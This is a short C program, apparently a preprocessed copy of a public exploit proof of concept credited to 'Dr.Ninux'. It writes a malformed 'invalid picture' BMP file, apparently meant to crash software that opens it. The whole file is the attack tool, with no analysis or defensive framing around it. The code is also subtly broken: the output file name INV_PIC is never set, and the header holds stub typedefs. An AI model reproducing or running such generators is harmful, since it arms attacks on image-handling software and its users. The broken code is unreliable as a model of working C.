
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int inv_ ;
typedef int FILE ;


 char* INV_PIC ;
 int exit (int ) ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fputc (char,int *) ;
 int printf (char*,...) ;

int main()
{

      int i=0;
      char inv_[]="LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL";
      FILE* inv_pic;

      printf("\t\t**********************************\n");
      printf("\t\t  ## Exploit Coded By Dr.Ninux ##\n");
      printf("\t\t  ##       www.LeZr.com        ##\n");
      printf("\t\t  ##  LeZr.com Security Team   ##\n");
      printf("\t\t  ##    Dr.Ninux@bsdmail.org   ##\n");
      printf("\t\t**********************************\n");
      printf("\n");

      if((inv_pic=fopen(INV_PIC,"wb"))==((void*)0))
      {
              printf("error:foepn().\n");
              exit(0);
      }

      printf("[+]Creating |invalid picture| ... plz wait.\n");

      for(i=0;i<sizeof(inv_);i++)
      {
              fputc(inv_[i],inv_pic);
      }

      fclose(inv_pic);
      printf("[+]BMP File %s Successfuly Created...\n",INV_PIC);

      return 0;
}
